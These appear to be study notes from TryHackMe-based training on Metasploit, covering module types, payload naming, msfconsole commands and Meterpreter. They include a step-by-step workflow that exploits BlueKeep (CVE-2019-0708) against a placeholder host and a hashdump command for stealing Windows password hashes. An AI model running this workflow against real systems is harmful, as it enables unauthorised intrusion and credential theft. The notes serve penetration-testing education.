Metasploit

List of modules and categories

In Kali Linux, the modules live in the /usr/share/metasploit-framework/modules directory.

On other Linux systems, locate the directory with the following command:

$ sudo find / -path '*metasploit-framework*modules' 2>/dev/null
  1. Auxiliary

Any supporting module, such as scanners, crawlers and fuzzers, can be found here.

  2. Encoders

Encoders allow you to encode the exploit and payload in the hope that a signature-based antivirus solution misses them.

  3. Evasion

While encoders encode the payload, they should not be considered a direct attempt to evade antivirus software. Evasion modules, on the other hand, do try to do that, with more or less success.

  4. Exploits

A piece of code that uses a vulnerability present on the target system.

  5. NOPs

NOPs (No OPeration) literally do nothing. On the Intel x86 CPU family they are represented by the byte 0x90, on which the CPU does nothing for one cycle. They are often used as padding to achieve consistent payload sizes.

  6. Payloads

Exploits leverage a vulnerability on the target system, but to achieve the desired result we need a payload. Examples include getting a shell, loading malware or a backdoor onto the target system, running a command, or launching calc.exe as a proof of concept for the penetration test report.

There are four directories under payloads: adapters, singles, stagers and stages.

a) Adapters: An adapter wraps single payloads to convert them into different formats. For example, a normal single payload can be wrapped inside a PowerShell adapter, which produces a single PowerShell command that executes the payload.

b) Singles: Self-contained payloads (add user, launch notepad.exe, etc.) that do not need to download an additional component to run.

c) Stagers: Responsible for setting up a connection channel between Metasploit and the target system; used with staged payloads. A staged payload first uploads a small stager to the target system, which then downloads the rest of the payload (the stage). The advantage is that the initial payload is relatively small compared to sending the full payload at once.

d) Stages: Downloaded by the stager. This allows you to use larger payloads.

  • Refer to the Naming conventions section below for more information.

  7. Post

Post modules are useful in the final stage of the penetration testing process, post-exploitation.

View sub-categories under each main module

To list the sub-categories under each main module category, run tree from that category's directory.

E.g., to view all the sub-categories under Exploits, run the following command from the /usr/share/metasploit-framework/modules/exploits directory:

/usr/share/metasploit-framework/modules/exploits$ tree -L 1
├── aix
├── android
├── apple_ios
├── bsd
├── bsdi
├── dialup
...

Naming conventions

General naming convention

<OS>/<architecture>/<payload>

  1. OS: Operating system such as Windows, Linux, etc.

  2. Architecture: x64 or x86

  3. Payload: reverse_tcp, bind_tcp, etc.

How to identify single and staged payloads?

Metasploit has a subtle way to help you identify single (also called inline) payloads and staged payloads.

  • windows/x64/shell_reverse_tcp (inline)

  • windows/x64/shell/reverse_tcp (staged)

Both are reverse Windows shells. The former is an inline (or single) payload, as indicated by the underscore (_) between shell and reverse; the latter is a staged payload, as indicated by the slash (/) between the same two words.
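The naming rule above, as an added example (not code from the original notes or from Metasploit itself): a small Ruby parser that splits a payload name into its <OS>/<architecture>/<payload> parts and classifies it as inline or staged from the separator between the payload type and the connection type. It assumes only the two architectures the notes list (x86 and x64) and treats any name that does not fit the convention as unparseable (returns nil).

```ruby
# Added example: classify Metasploit payload names by the convention
# <OS>/<architecture>/<payload>. Assumption: only x86 and x64 count as
# architecture tokens (the two the notes list); the token is optional.
ARCHITECTURES = %w[x86 x64].freeze

# Returns a hash {os:, arch:, type:, connection:, kind:} or nil when the
# name does not follow the convention (fewer than two parts, empty part).
def parse_payload_name(name)
  parts = name.split('/')
  return nil if parts.length < 2 || parts.any?(&:empty?)

  os   = parts.shift
  arch = ARCHITECTURES.include?(parts.first) ? parts.shift : nil
  return nil if parts.empty?

  if parts.length >= 2
    # shell/reverse_tcp: a slash separates the stage from the stager, so a
    # small stager is sent first and fetches the rest (the stage) afterwards.
    { os: os, arch: arch, type: parts[0],
      connection: parts[1..-1].join('/'), kind: :staged }
  else
    # shell_reverse_tcp: an underscore joins them, so the whole payload is
    # self-contained (inline/single). Names without an underscore keep a
    # nil connection part.
    type, connection = parts[0].split('_', 2)
    { os: os, arch: arch, type: type, connection: connection, kind: :inline }
  end
end

# The question the notes ask: is this payload name staged?
def staged_payload?(name)
  info = parse_payload_name(name)
  !info.nil? && info[:kind] == :staged
end

# One-line summary in the wording used above ("inline shell payload ...").
def describe_payload(name)
  info = parse_payload_name(name)
  return "#{name}: does not follow the <OS>/<architecture>/<payload> convention" if info.nil?

  arch = info[:arch] ? " #{info[:arch]}" : ''
  conn = info[:connection] ? " over #{info[:connection]}" : ''
  "#{name}: #{info[:kind]} #{info[:type]} payload for#{arch} #{info[:os]}#{conn}"
end

puts describe_payload('windows/x64/shell_reverse_tcp')
puts describe_payload('windows/x64/shell/reverse_tcp')
```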

msfconsole

msfconsole is the main interface to the Metasploit framework.

Commands overview

  1. Common shell commands

a) ls

b) ping

c) clear

d) exit

  1. help

  2. history

  3. search

Search by CVE numbers, exploit names (eternalblue, heartbleed, etc.), or target system. The search function can be directed using keywords such as type and platform.

msf6 > search type:auxiliary telnet
  4. use

E.g., the windows/ssh/freesshd_authbypass module:

msf6 > use exploit/windows/ssh/freesshd_authbypass
  5. show

a) show options

b) show payloads

c) show targets

msf6 exploit(windows/ssh/freesshd_authbypass) > show options

Module options (exploit/windows/ssh/freesshd_authbypass):

   Name       Current Setting                    Required  Description
   ----       ---------------                    --------  -----------
   RHOSTS                                        yes       The target host(s), see https://docs.metasploit.com/docs/u
                                                           sing-metasploit/basics/using-metasploit.html
   RPORT      22                                 yes       The target port (TCP)
   
   ...
msf6 exploit(windows/ssh/freesshd_authbypass) > show payloads
...
  6. set

a) set payload

b) set target

From the same windows/ssh/freesshd_authbypass module above:

# RHOSTS option required as shown from "show options" command above
msf6 exploit(windows/ssh/freesshd_authbypass) > set rhosts 10.10.10.22

msf6 exploit(windows/ssh/freesshd_authbypass) > show options

Module options (exploit/windows/ssh/freesshd_authbypass):

   Name       Current Setting                    Required  Description
   ----       ---------------                    --------  -----------
   RHOSTS     10.10.10.22                        yes       The target host(s), see https://docs.metasploit.com/docs/u
                                                           sing-metasploit/basics/using-metasploit.html
   RPORT      22                                 yes       The target port (TCP)
   
   ...
   
msf6 exploit(windows/ssh/freesshd_authbypass) > show payloads
...
msf6 exploit(windows/ssh/freesshd_authbypass) > set payload <index_or_name_of_payload>

Use the unset command to remove option values:

msf6 exploit(windows/ssh/freesshd_authbypass) > unset rhosts
msf6 exploit(windows/ssh/freesshd_authbypass) > unset all # remove all options
  7. info

msf6 > info exploit/windows/ssh/freesshd_authbypass
...

# OR from within the module
msf6 exploit(windows/ssh/freesshd_authbypass) > info
       Name: Freesshd Authentication Bypass
     Module: exploit/windows/ssh/freesshd_authbypass
   Platform: Windows
       Arch: 
 Privileged: Yes
    License: Metasploit Framework License (BSD)
       Rank: Excellent
  Disclosed: 2010-08-11

...

Global option values

Use the setg and unsetg commands: setg sets an option value globally, so it persists across the modules you use in that session, and unsetg removes it.

  8. exploit/run/check

The exploit and run commands can be executed from the module once all relevant module parameters/options have been set with the set command (see above). The exploit and run commands do the same thing.

Adding the -z flag to the exploit command runs the exploit and backgrounds the session as soon as it opens.

msf6 exploit(windows/ssh/freesshd_authbypass) > exploit

Some modules support the check command, which checks whether the target system is vulnerable without exploiting it.

  9. background

The background command can be used to background the session prompt and go back to the msfconsole prompt.

  10. sessions

The sessions command can be used from the msfconsole prompt or any context to see the existing sessions.

msf6 exploit(windows/ssh/freesshd_authbypass) > sessions

Active sessions
===============

  Id  Name  Type                     Information                   Connection
  --  ----  ----                     -----------                   ----------
  1   ...   ...                      ...                           ...

The sessions -i command can be used to interact with a session:

msf6 > sessions
Active sessions
===============

  Id  Name  Type                     Information                   Connection
  --  ----  ----                     -----------                   ----------
  1   ...   ...                      ...                           ...

msf6 > sessions -i 1
  11. back

msf6 exploit(windows/ssh/freesshd_authbypass) > back
msf6 > 

Typical workflow

  1. Identify service that is running

Eg. RDP service on port 3389

$ sudo nmap ...

PORT     STATE SERVICE
3389/tcp open  ms-wbt-server
...
  2. Search (search command) for an auxiliary module (e.g. a scanner) and select it using the use command

msf6 > search type:auxiliary scanner/rdp
0  auxiliary/scanner/rdp/cve_2019_0708_bluekeep  2019-05-14       normal  Yes    CVE-2019-0708 BlueKeep Microsoft Remote Desktop RCE Check
...

msf6 > use 0
  3. View information about the module using the info or show options command, identify the required parameters and set their values (rhosts, etc.)

msf6 auxiliary(scanner/rdp/cve_2019_0708_bluekeep) > info
msf6 auxiliary(scanner/rdp/cve_2019_0708_bluekeep) > set rhosts ...
msf6 auxiliary(scanner/rdp/cve_2019_0708_bluekeep) > set ...
  4. Run the auxiliary module to discover whether the target system is vulnerable (run/exploit command)

Suppose the target is vulnerable:

msf6 auxiliary(scanner/rdp/cve_2019_0708_bluekeep) > run
... SYSTEM IS VULNERABLE TO ... bluekeep ....
  5. Search (search command) for the related exploit and select it using the use command

msf6 > search type:exploit bluekeep
 0  exploit/windows/rdp/cve_2019_0708_bluekeep_rce    2019-05-14 ...
 
msf6 > use 0
  6. Read information about the exploit using the info or show options command, identify the required parameters and set their values

msf6 exploit(windows/rdp/cve_2019_0708_bluekeep_rce) > info
msf6 exploit(windows/rdp/cve_2019_0708_bluekeep_rce) > set rhosts ...
msf6 exploit(windows/rdp/cve_2019_0708_bluekeep_rce) > set ...
  7. List the compatible payloads, read information about the chosen one, and set it

Alternatively, keep the default payload the module selects.

msf6 exploit(windows/rdp/cve_2019_0708_bluekeep_rce) > show payloads
msf6 exploit(windows/rdp/cve_2019_0708_bluekeep_rce) > set payload 0 # e.g. payload index 0
  8. View the targets and select the relevant one

msf6 exploit(windows/rdp/cve_2019_0708_bluekeep_rce) > show targets
msf6 exploit(windows/rdp/cve_2019_0708_bluekeep_rce) > set target ...
  9. Run the exploit

msf6 exploit(windows/rdp/cve_2019_0708_bluekeep_rce) > exploit
  10. Gain a Meterpreter session

meterpreter > pwd
meterpreter > ls 
meterpreter > shell
...

Meterpreter

Useful commands:

  1. help

  • Displays the help menu

  2. background

  • Sends the current Meterpreter session into the background and returns to the msf prompt

  • Use the sessions -i command to get back to the Meterpreter session

  3. cat, cd, pwd, ls

  • Similar to the Linux command line

  4. hashdump

  • Dumps the contents of the SAM database

  • The Security Accounts Manager (SAM) is a database file in Windows that contains usernames and passwords

  5. shell

  • Presents a standard shell on the target system

Content and knowledge from TryHackMe.
